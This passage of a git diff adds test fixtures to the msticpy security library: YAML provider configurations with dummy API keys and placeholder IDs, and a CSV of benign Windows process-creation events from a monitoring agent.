+        EnvironmentVar: "MAXMIND_AUTH"
+      DBFolder: "~/.msticpy"
+    Provider: "GeoLiteLookup"
+  IPStack:
+    Args:
+      AuthKey: "987654321-222"
+    Provider: "IPStackLookup"
\ No newline at end of file
diff --git a/tests/testdata/msticpyconfig-no-settings.yaml b/tests/testdata/msticpyconfig-no-settings.yaml
new file mode 100644
index 000000000..457510f8e
--- /dev/null
+++ b/tests/testdata/msticpyconfig-no-settings.yaml
@@ -0,0 +1,60 @@
+# AzureSentinel:
+  # Workspaces:
+  #   Default:
+  #     WorkspaceId: "52b1ab41-869e-4138-9e40-2a4457f09bf3"
+  #     TenantId: "72f988bf-86f1-41af-91ab-2d7cd011db49"
+  #   MyTestWS:
+  #     WorkspaceId: "a927809c-8142-43e1-96b3-4ad87cfe95a3"
+  #     TenantId: "69d28fd7-42a5-48bc-a619-af56397b9f28"
+QueryDefinitions:
+  Default:
+    - 'queries'
+  Custom:
+    - 'testdata'
+TIProviders:
+  OTX:
+    Args:
+      AuthKey: "987654321"
+    Primary: True
+    Provider: "OTX" # Explicitly name provider to override
+  VirusTotal:
+    Args:
+      ApiID:
+        KeyVaultURI: "https://constoso.vault.azure.net/secrets/kvname/kvsecretId"
+      AuthKey:
+        KeyVaultURI: "https://constoso.vault.azure.net/secrets/kvname/kvsecretId"
+    Primary: True
+    Provider: "VirusTotal"
+  XForce:
+    Args:
+      ApiID:
+        EnvironmentVar: "XFORCE_ID"
+      AuthKey:
+        EnvironmentVar: "XFORCE_KEY"
+    Primary: False
+    Provider: "XForce"
+  AzureSentinel:
+    Args:
+      WorkspaceID: "a927809c-8142-43e1-96b3-4ad87cfe95a3"
+      TenantID: "69d28fd7-42a5-48bc-a619-af56397b9f28"
+    Primary: True
+    Provider: "NoLoad-AzSTI"
+  OpenPageRank:
+    Args:
+      AuthKey: "69d28fd7-42a5-48bc-a619-af56397b9f28"
+    Primary: True
+    Provider: "OPR"
+  TorExitNodes:
+    Primary: True
+    Provider: Tor
+OtherProviders:
+  GeoIPLite:
+    Args:
+      AuthKey:
+        EnvironmentVar: "MAXMIND_AUTH"
+      DBFolder: "~/.msticpy"
+    Provider: "GeoLiteLookup"
+  IPStack:
+    Args:
+      AuthKey: "987654321-222"
+    Provider: "IPStackLookup"
\ No newline at end of file
diff --git a/tests/testdata/msticpyconfig-noAzSentSettings.yaml b/tests/testdata/msticpyconfig-noAzSentSettings.yaml
new file mode 100644
index 000000000..7d7fd7750
--- /dev/null
+++ b/tests/testdata/msticpyconfig-noAzSentSettings.yaml
@@ -0,0 +1,60 @@
+AzureSentinel:
+  # Workspaces:
+  #   Default:
+  #     WorkspaceId: "52b1ab41-869e-4138-9e40-2a4457f09bf3"
+  #     TenantId: "72f988bf-86f1-41af-91ab-2d7cd011db49"
+  #   MyTestWS:
+  #     WorkspaceId: "a927809c-8142-43e1-96b3-4ad87cfe95a3"
+  #     TenantId: "69d28fd7-42a5-48bc-a619-af56397b9f28"
+QueryDefinitions:
+  Default:
+    - 'queries'
+  Custom:
+    - 'testdata'
+TIProviders:
+  OTX:
+    Args:
+      AuthKey: "987654321"
+    Primary: True
+    Provider: "OTX" # Explicitly name provider to override
+  VirusTotal:
+    Args:
+      ApiID:
+        KeyVaultURI: "https://constoso.vault.azure.net/secrets/kvname/kvsecretId"
+      AuthKey:
+        KeyVaultURI: "https://constoso.vault.azure.net/secrets/kvname/kvsecretId"
+    Primary: True
+    Provider: "VirusTotal"
+  XForce:
+    Args:
+      ApiID:
+        EnvironmentVar: "XFORCE_ID"
+      AuthKey:
+        EnvironmentVar: "XFORCE_KEY"
+    Primary: False
+    Provider: "XForce"
+  AzureSentinel:
+    Args:
+      WorkspaceID: "a927809c-8142-43e1-96b3-4ad87cfe95a3"
+      TenantID: "69d28fd7-42a5-48bc-a619-af56397b9f28"
+    Primary: True
+    Provider: "NoLoad-AzSTI"
+  OpenPageRank:
+    Args:
+      AuthKey: "69d28fd7-42a5-48bc-a619-af56397b9f28"
+    Primary: True
+    Provider: "OPR"
+  TorExitNodes:
+    Primary: True
+    Provider: Tor
+OtherProviders:
+  GeoIPLite:
+    Args:
+      AuthKey:
+        EnvironmentVar: "MAXMIND_AUTH"
+      DBFolder: "~/.msticpy"
+    Provider: "GeoLiteLookup"
+  IPStack:
+    Args:
+      AuthKey: "987654321-222"
+    Provider: "IPStackLookup"
\ No newline at end of file
diff --git a/tests/testdata/msticpyconfig-nokusto.yaml b/tests/testdata/msticpyconfig-nokusto.yaml
new file mode 100644
index 000000000..c0e4da0ce
--- /dev/null
+++ b/tests/testdata/msticpyconfig-nokusto.yaml
@@ -0,0 +1,94 @@
+AzureSentinel:
+  Workspaces:
+    Default:
+      WorkspaceId: "52b1ab41-869e-4138-9e40-2a4457f09bf3"
+      TenantId: "72f988bf-86f1-41af-91ab-2d7cd011db49"
+    MyTestWS:
+      WorkspaceId: "a927809c-8142-43e1-96b3-4ad87cfe95a3"
+      TenantId: "69d28fd7-42a5-48bc-a619-af56397b9f28"
+QueryDefinitions:
+  Default:
+    - "queries"
+  Custom:
+    - "testdata"
+Azure:
+  cloud: "global"
+  auth_methods: ["env", "cli", "msi", "interactive"]
+TIProviders:
+  OTX:
+    Args:
+      # [SuppressMessage("Microsoft.Security", "CS002:SecretInNextLine", Justification="Test code")]
+      AuthKey: "987654321"
+    Primary: True
+    Provider: "OTX" # Explicitly name provider to override
+  VirusTotal:
+    Args:
+      AuthKey:
+        EnvironmentVar: VTAUTHKEY
+    Primary: True
+    Provider: "VirusTotal"
+  XForce:
+    Args:
+      ApiID:
+        EnvironmentVar: "XFORCE_ID"
+      AuthKey:
+        EnvironmentVar: "XFORCE_KEY"
+    Primary: False
+    Provider: "XForce"
+  GreyNoise:
+    Args:
+      AuthKey: ""
+    Primary: True
+    Provider: "GreyNoise"
+  AzureSentinel:
+    Args:
+      WorkspaceID: "a927809c-8142-43e1-96b3-4ad87cfe95a3"
+      TenantID: "69d28fd7-42a5-48bc-a619-af56397b9f28"
+    Primary: True
+    Provider: "NoLoad-AzSTI"
+  OpenPageRank:
+    Args:
+      # [SuppressMessage("Microsoft.Security", "CS002:SecretInNextLine", Justification="Test code")]
+      AuthKey: "69d28fd7-42a5-48bc-a619-af56397b9f28"
+    Primary: True
+    Provider: "OPR"
+  TorExitNodes:
+    Primary: True
+    Provider: Tor
+  RiskIQ:
+    Primary: True
+    Provider: "RiskIQ"
+    Args:
+      ApiID: "user@host.com"
+      AuthKey: "aaaa-bbbb-cccc-dddd-eeee"
+OtherProviders:
+  GeoIPLite:
+    Args:
+      AuthKey:
+        EnvironmentVar: "MAXMIND_AUTH"
+      DBFolder: "~/.msticpy"
+    Provider: "GeoLiteLookup"
+  IPStack:
+    Args:
+      # [SuppressMessage("Microsoft.Security", "CS002:SecretInNextLine", Justification="Test code")]
+      AuthKey: "987654321-222"
+    Provider: "IPStackLookup"
+DataProviders:
+  AzureCLI:
+    Args:
+      clientId: "69d28fd7-42a5-48bc-a619-af56397b1111"
+      tenantId: "69d28fd7-42a5-48bc-a619-af56397b2222"
+      # [SuppressMessage("Microsoft.Security", "CS002:SecretInNextLine", Justification="Test code")]
+      clientSecret: "69d28fd7-42a5-48bc-a619-af56397b3333"
+  MicrosoftDefender:
+    Args:
+      TenantId: 8360dd21-0294-4240-9128-89611f415c53
+      ClientId: 66b9818a-26cd-4584-8eb0-7f7a499242aa
+      ClientSecret:
+        EnvironmentVar: "IPSTACK_AUTH"
+  MicrosoftGraph:
+    Args:
+      TenantId: 8360dd21-0294-4240-9128-89611f415c53
+      ClientId: 66b9818a-26cd-4584-8eb0-7f7a499242aa
+      ClientSecret:
+        EnvironmentVar: "IPSTACK_AUTH"
diff --git a/tests/testdata/msticpyconfig.yaml b/tests/testdata/msticpyconfig.yaml
new file mode 100644
index 000000000..6cb779430
--- /dev/null
+++ b/tests/testdata/msticpyconfig.yaml
@@ -0,0 +1,116 @@
+AzureSentinel:
+  Workspaces:
+    Default:
+      WorkspaceId: "52b1ab41-869e-4138-9e40-2a4457f09bf3"
+      TenantId: "72f988bf-86f1-41af-91ab-2d7cd011db49"
+    MyTestWS:
+      WorkspaceId: "a927809c-8142-43e1-96b3-4ad87cfe95a3"
+      TenantId: "69d28fd7-42a5-48bc-a619-af56397b9f28"
+QueryDefinitions:
+  Default:
+    - "queries"
+  Custom:
+    - "testdata"
+Azure:
+  cloud: "global"
+  auth_methods: ["env", "cli", "msi", "interactive"]
+TIProviders:
+  OTX:
+    Args:
+      # [SuppressMessage("Microsoft.Security", "CS002:SecretInNextLine", Justification="Test code")]
+      AuthKey: "987654321"
+    Primary: True
+    Provider: "OTX" # Explicitly name provider to override
+  VirusTotal:
+    Args:
+      AuthKey:
+        EnvironmentVar: VTAUTHKEY
+    Primary: True
+    Provider: "VirusTotal"
+  XForce:
+    Args:
+      ApiID:
+        EnvironmentVar: "XFORCE_ID"
+      AuthKey:
+        EnvironmentVar: "XFORCE_KEY"
+    Primary: False
+    Provider: "XForce"
+  GreyNoise:
+    Args:
+      AuthKey: ""
+    Primary: True
+    Provider: "GreyNoise"
+  AzureSentinel:
+    Args:
+      WorkspaceID: "a927809c-8142-43e1-96b3-4ad87cfe95a3"
+      TenantID: "69d28fd7-42a5-48bc-a619-af56397b9f28"
+    Primary: True
+    Provider: "NoLoad-AzSTI"
+  OpenPageRank:
+    Args:
+      # [SuppressMessage("Microsoft.Security", "CS002:SecretInNextLine", Justification="Test code")]
+      AuthKey: "69d28fd7-42a5-48bc-a619-af56397b9f28"
+    Primary: True
+    Provider: "OPR"
+  TorExitNodes:
+    Primary: True
+    Provider: Tor
+  RiskIQ:
+    Primary: True
+    Provider: "RiskIQ"
+    Args:
+      ApiID: "user@host.com"
+      AuthKey: "aaaa-bbbb-cccc-dddd-eeee"
+  IntSights:
+    Args:
+      ApiID: "INTSIGHTS_ID"
+      AuthKey: "INTSIGHTS_KEY"
+    Primary: False
+    Provider: "IntSights"
+OtherProviders:
+  GeoIPLite:
+    Args:
+      AuthKey:
+        EnvironmentVar: "MAXMIND_AUTH"
+      DBFolder: "~/.msticpy"
+    Provider: "GeoLiteLookup"
+  IPStack:
+    Args:
+      # [SuppressMessage("Microsoft.Security", "CS002:SecretInNextLine", Justification="Test code")]
+      AuthKey: "987654321-222"
+    Provider: "IPStackLookup"
+DataProviders:
+  Kusto-MSTIC1:
+    Args:
+      Cluster: https://mstic.kusto.windows.net
+      IntegratedAuth: True
+  Kusto-MSTIC2:
+    Args:
+      Cluster: https://msticapp.kusto.windows.net
+      ClientId: 69d28fd7-42a5-48bc-a619-af56397b1111
+      TenantId: 69d28fd7-42a5-48bc-a619-af56397b9f28
+      ClientSecret: "[PLACEHOLDER]"
+  AzureCLI:
+    Args:
+      clientId: "69d28fd7-42a5-48bc-a619-af56397b1111"
+      tenantId: "69d28fd7-42a5-48bc-a619-af56397b2222"
+      # [SuppressMessage("Microsoft.Security", "CS002:SecretInNextLine", Justification="Test code")]
+      clientSecret: "69d28fd7-42a5-48bc-a619-af56397b3333"
+  MicrosoftDefender:
+    Args:
+      TenantId: 8360dd21-0294-4240-9128-89611f415c53
+      ClientId: 66b9818a-26cd-4584-8eb0-7f7a499242aa
+      ClientSecret:
+        EnvironmentVar: "IPSTACK_AUTH"
+  MicrosoftGraph:
+    Args:
+      TenantId: 8360dd21-0294-4240-9128-89611f415c53
+      ClientId: 66b9818a-26cd-4584-8eb0-7f7a499242aa
+      ClientSecret:
+        EnvironmentVar: "IPSTACK_AUTH"
+  Cybereason:
+    Args:
+      TenantId: 8360dd21-0294-4240-9128-89611f415c53
+      ClientId: 66b9818a-26cd-4584-8eb0-7f7a499242aa
+      ClientSecret:
+        EnvironmentVar: "IPSTACK_AUTH"
diff --git a/tests/testdata/processes_on_host.csv b/tests/testdata/processes_on_host.csv
new file mode 100644
index 000000000..8e86d8826
--- /dev/null
+++ b/tests/testdata/processes_on_host.csv
@@ -0,0 +1,364 @@
+,TenantId,Account,EventID,TimeGenerated,Computer,SubjectUserSid,SubjectUserName,SubjectDomainName,SubjectLogonId,NewProcessId,NewProcessName,TokenElevationType,ProcessId,CommandLine,ParentProcessName,TargetLogonId,SourceComputerId,TimeCreatedUtc
+0,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:24:24.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1610,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:24:24.010
+1,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:24:24.023,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1790,C:\Windows\System32\conhost.exe,%%1936,0x1610,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:24:24.023
+2,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:24:25.807,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xcd8,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:24:25.807
+3,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:24:26.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x28c,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:24:26.010
+4,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:07:26.003,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1284,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:07:26.003
+5,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:08:24.013,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xb10,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:08:24.013
+6,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:08:24.030,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x2a8,C:\Windows\System32\conhost.exe,%%1936,0xb10,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:08:24.030
+7,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:08:25.717,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x90c,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:08:25.717
+8,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:08:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x130c,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:08:26.007
+9,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:09:26.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc84,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:09:26.010
+10,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:10:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x570,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:10:24.000
+11,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:10:24.047,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x28c,C:\Windows\System32\conhost.exe,%%1936,0x570,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:10:24.047
+12,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:10:25.653,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xb8,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:10:25.653
+13,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:10:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xd14,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:10:26.000
+14,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:20:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1490,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:20:24.000
+15,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:20:24.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x148c,C:\Windows\System32\conhost.exe,%%1936,0x1490,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:20:24.017
+16,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:20:25.337,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1414,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:20:25.337
+17,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:20:26.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1530,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:20:26.017
+18,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:21:26.003,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x7b4,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:21:26.003
+19,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:17:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1594,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:17:26.000
+20,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:18:24.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1630,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:18:24.010
+21,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:18:24.027,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x16a0,C:\Windows\System32\conhost.exe,%%1936,0x1630,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:18:24.027
+22,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:18:25.407,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1694,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:18:25.407
+23,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:18:26.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1658,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:18:26.010
+24,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:19:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1740,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:19:26.000
+25,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:47:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xd14,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:47:26.000
+26,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:48:24.013,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1094,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:48:24.013
+27,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:48:24.030,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1270,C:\Windows\System32\conhost.exe,%%1936,0x1094,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:48:24.030
